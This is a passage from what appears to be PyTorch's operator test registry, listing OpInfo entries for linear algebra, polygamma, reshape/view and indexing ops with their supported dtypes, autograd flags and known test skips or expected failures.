DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.inv_ex', aten_name='linalg_inv_ex', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_invertible, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # AssertionError: Scalars are not equal! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), UnaryUfuncInfo('angle', ref=np.angle, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool), decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-2}),), backward_dtypes=floating_and_complex_types_and(torch.bfloat16, torch.float16), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.chalf), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse_csr=True, supports_complex_to_float=True, skips=( # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,),), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,),), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,),), )), UnaryUfuncInfo('isfinite', ref=np.isfinite, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_autograd=False), UnaryUfuncInfo('isinf', ref=np.isinf, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_sparse=True, supports_sparse_csr=True, supports_autograd=False, skips=( # "nonzero_count_cpu" not implemented for 'ComplexHalf' # "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_sparse_csr_consistency", dtypes=(torch.chalf,)), # "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_zero_to_zero_correspondence_unary", dtypes=(torch.chalf,)), )), UnaryUfuncInfo('isposinf', ref=np.isposinf, dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), supports_sparse=True, supports_sparse_csr=True, supports_autograd=False), UnaryUfuncInfo('isneginf', ref=np.isneginf, dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), supports_sparse=True, supports_sparse_csr=True, supports_autograd=False), UnaryUfuncInfo('isreal', ref=np.isreal, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_autograd=False), UnaryUfuncInfo('isnan', ref=np.isnan, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_sparse=True, supports_sparse_csr=True, supports_autograd=False), OpInfo('linalg.solve', aten_name='linalg_solve', op=torch.linalg.solve, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_solve, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # AssertionError: Scalars are not equal! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.solve_triangular', aten_name='linalg_solve_triangular', op=torch.linalg.solve_triangular, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_solve_triangular, supports_fwgrad_bwgrad=True, skips=(skipCPUIfNoLapack,), # linalg.solve_triangular cannot be batched over because of a call to out.copy_(result); supports_forward_ad=True), OpInfo('linalg.matrix_rank', aten_name='linalg_matrix_rank', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_invertible, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ), ), OpInfo('linalg.matrix_rank', aten_name='linalg_matrix_rank', variant_test_name='hermitian', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_pinv_hermitian, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ), ), OpInfo('linalg.pinv', aten_name='linalg_pinv', op=torch.linalg.pinv, dtypes=floating_and_complex_types(), check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_pinv, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # errors with "leaked XXXX bytes CUDA memory on device 0" DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='cuda'),) ), OpInfo('linalg.pinv', aten_name='linalg_pinv', variant_test_name='singular', # pinv is Frechet-differentiable in a rank-preserving neighborhood, # so we feed inputs that are the products of two full-rank factors, # to avoid any rank changes caused by the perturbations in the gradcheck op=lambda a, b: torch.linalg.pinv(a @ b.mT), dtypes=floating_and_complex_types(), supports_out=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_pinv_singular, # Only large tensors show issues with implicit backward used prior to # explicit backward implementation. decorators=[slowTest, skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # CUDA runs out of memory DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad', device_type='cuda', dtypes=[torch.cdouble]), # This test takes almost 2 hours to run! DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad', device_type='cuda', dtypes=[torch.cdouble]), )), OpInfo('linalg.pinv', aten_name='linalg_pinv', variant_test_name='hermitian', dtypes=floating_and_complex_types(), check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_pinv_hermitian, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ) ), OpInfo('eig', op=torch.eig, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_eig, error_inputs_func=error_inputs_eig, decorators=[ skipCUDAIfNoMagma, skipCPUIfNoLapack, ], ), OpInfo('einsum', # we need this lambda because SampleInput expects tensor input as the first argument # TODO(@heitorschueroff) update SampleInput to handle such cases op=lambda tensors, equation: torch.einsum(equation, tensors), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half, *[torch.bfloat16] if ((SM60OrLater and CUDA11OrLater) or TEST_WITH_ROCM) else []), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, # See https://github.com/pytorch/pytorch/issues/66357 sample_inputs_func=sample_inputs_einsum, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # test does not work with passing lambda for op # there's a test `test_einsum` in `test_jit.py` to handle this case # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('svd', op=torch.svd, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_svd, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, # We're using at::allclose, which does not have a batching rule check_batched_grad=False, check_batched_gradgrad=False, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], skips=( # Fixme, forward over backward gives a numerical error DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=(torch.complex128,)), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.svd', op=torch.linalg.svd, aten_name='linalg_svd', dtypes=floating_and_complex_types(), supports_fwgrad_bwgrad=True, supports_forward_ad=True, check_batched_forward_grad=False, # We're using at::allclose, which does not have a batching rule check_batched_grad=False, check_batched_gradgrad=False, sample_inputs_func=sample_inputs_svd, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], skips=( # FIXME forward over backward gives a numerical error DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=(torch.complex128,)), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.svdvals', op=torch.linalg.svdvals, aten_name='linalg_svdvals', dtypes=floating_and_complex_types(), check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, supports_forward_ad=True, # We're using at::allclose, which does not have a batching rule check_batched_gradgrad=False, sample_inputs_func=sample_inputs_linalg_svdvals, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off]), OpInfo('svd_lowrank', op=lambda *args, **kwargs: wrapper_set_seed( lambda a, b, **kwargs: torch.svd_lowrank(a @ b.mT, **kwargs), *args, **kwargs ), dtypes=floating_types(), supports_out=False, check_batched_grad=False, check_batched_gradgrad=False, check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, supports_forward_ad=True, sample_inputs_func=sample_inputs_svd_lowrank, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off, DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-03, rtol=1e-03)}), 'TestCommon', 'test_noncontiguous_samples', device_type='cuda')], skips=( # test does not work with passing lambda for op DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('pca_lowrank', op=lambda *args, **kwargs: wrapper_set_seed( lambda a, b, **kwargs: torch.pca_lowrank(a @ b.mT, **kwargs), *args, **kwargs ), dtypes=floating_types(), supports_out=False, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_pca_lowrank, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off, DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-03, rtol=1e-03)}), 'TestCommon', 'test_noncontiguous_samples', device_type='cuda')], skips=( # test does not work with passing lambda for op DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), BinaryUfuncInfo('polar', dtypes=floating_types(), # this function is undefined if 'abs' values are <0 supports_forward_ad=True, lhs_make_tensor_kwargs=dict(low=0), supports_rhs_python_scalar=False, skips=( # RuntimeError: Expected object of scalar type Float but got scalar type Double for second argument DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs', 'test_type_promotion'), # GradcheckError: Jacobian computed with forward mode mismatch for output 0 with respect to input 0 # Numerical: # tensor([[0.]], dtype=torch.float64) # Analytical: # tensor([[-0.0047]], dtype=torch.float64, grad_fn=<CopySlices>) DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'), )), # TODO(@kshitij12345): Refactor similar to `mvlgamma` entries. # To test reference numerics against multiple values of argument `n`, # we make multiple OpInfo entries with each entry corresponding to different value of n (currently 0 to 4). # We run the op tests from test_ops.py only for `n=0` to avoid redundancy in testing. UnaryUfuncInfo('polygamma', op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs), variant_test_name='polygamma_n_0', ref=reference_polygamma if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), ), sample_kwargs=lambda device, dtype, input: ({'n': 0}, {'n': 0})), # A separate OpInfo entry for special.polygamma is needed to reorder the arguments # for the alias. See the discussion here: https://github.com/pytorch/pytorch/pull/59691#discussion_r650261939 UnaryUfuncInfo('special.polygamma', op=lambda x, n, **kwargs: torch.special.polygamma(n, x, **kwargs), variant_test_name='special_polygamma_n_0', ref=reference_polygamma if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), ), sample_kwargs=lambda device, dtype, input: ({'n': 0}, {'n': 0}), # polygamma functions have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), UnaryUfuncInfo('polygamma', op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs), variant_test_name='polygamma_n_1', ref=reference_polygamma if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( # Redundant tests DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), # Mismatch: https://github.com/pytorch/pytorch/issues/55357 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large'), ), sample_kwargs=lambda device, dtype, input: ({'n': 1}, {'n': 1}), # polygamma functions have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), UnaryUfuncInfo('polygamma', op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs), variant_test_name='polygamma_n_2', ref=reference_polygamma if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( # Redundant tests DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), # Mismatch: https://github.com/pytorch/pytorch/issues/55357 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', active_if=TEST_WITH_ROCM), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=TEST_WITH_ROCM),), sample_kwargs=lambda device, dtype, input: ({'n': 2}, {'n': 2}), # polygamma functions have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), UnaryUfuncInfo('polygamma', op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs), variant_test_name='polygamma_n_3', ref=reference_polygamma if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( # Redundant tests DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), # Mismatch: https://github.com/pytorch/pytorch/issues/55357 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'),), sample_kwargs=lambda device, dtype, input: ({'n': 3}, {'n': 3}), # polygamma functions have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), UnaryUfuncInfo('polygamma', op=lambda x, n, **kwargs: torch.polygamma(n, x, **kwargs), variant_test_name='polygamma_n_4', ref=reference_polygamma if TEST_SCIPY else _NOTHING, decorators=(precisionOverride({torch.float16: 5e-4, torch.float32: 5e-4}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_polygamma, skips=( # Redundant tests DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNormalizeOperators'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), # Mismatch: https://github.com/pytorch/pytorch/issues/55357 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', active_if=TEST_WITH_ROCM), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=TEST_WITH_ROCM),), sample_kwargs=lambda device, dtype, input: ({'n': 4}, {'n': 4}), # polygamma functions have multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), OpInfo('ravel', ref=np.ravel, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_ravel, ), OpInfo('reshape', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), sample_inputs_func=partial(sample_inputs_view_reshape, transpose_samples=True), reference_inputs_func=partial(reference_inputs_view_reshape, transpose_samples=True), error_inputs_func=error_inputs_reshape, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('reshape_as', op=lambda x, other: x.reshape_as(other), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_view_as_reshape_as, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('view', op=lambda x, shape: x.view(shape), dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, sample_inputs_func=partial(sample_inputs_view_reshape, transpose_samples=False), reference_inputs_func=partial(reference_inputs_view_reshape, transpose_samples=False), skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('view_as', op=lambda x, other: x.view_as(other), dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_view_as_reshape_as, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('atleast_1d', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_atleast1d2d3d, skips=( # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), ), OpInfo('atleast_2d', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), sample_inputs_func=sample_inputs_atleast1d2d3d, ), OpInfo('atleast_3d', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), sample_inputs_func=sample_inputs_atleast1d2d3d, ), OpInfo('flatten', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_flatten, reference_inputs_func=reference_inputs_flatten, ), OpInfo('column_stack', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"),), sample_inputs_func=sample_inputs_column_stack,), OpInfo('pinverse', op=torch.pinverse, dtypes=floating_and_complex_types(), check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False, sample_inputs_func=sample_inputs_linalg_invertible, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('gather', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_gather, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_forward_ad=True, supports_fwgrad_bwgrad=True, error_inputs_func=error_inputs_gather, ), OpInfo('index_fill', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_index), OpInfo('index_copy', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( ), sample_inputs_func=sample_inputs_index, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('index_select', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_index, error_inputs_func=error_inputs_index_select, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('index_add', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_index, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('index_reduce', dtypes=floating_types_and(torch.float16, torch.bfloat16), supports_out=True, sample_inputs_func=sample_inputs_index_reduce), OpInfo('__getitem__', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_inplace_autograd=False, supports_scripting=False, op=torch.Tensor.__getitem__, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: False is not true : Scalars failed to compare as equal! 0 != 104448 DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='cuda'),), sample_inputs_func=sample_inputs_getitem), OpInfo('index_put', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_inplace_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, test_neg_view=False, sample_inputs_func=sample_inputs_index_put, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: The following operation failed in the TorchScript interpreter. # Traceback of TorchScript (most recent call last): # File "<string>", line 3, in forward # def the_method(i0, i1: List[torch.Tensor], i2): # return torch.index_put(i0, i1, i2, accumulate=False) # ~~~~~~~~~~~~~~~ <--- HERE # RuntimeError: a leaf Variable that requires grad is being used in an in-place operation. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('sort', dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_sort, supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo('unique', dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.float16), sample_inputs_func=sample_inputs_unique, supports_out=False, supports_autograd=False, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # 76571 DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values', dtypes=(torch.float16, torch.float32, torch.float64)), )), OpInfo('unique_consecutive', dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.float16), sample_inputs_func=sample_inputs_unique_consecutive, supports_out=False, 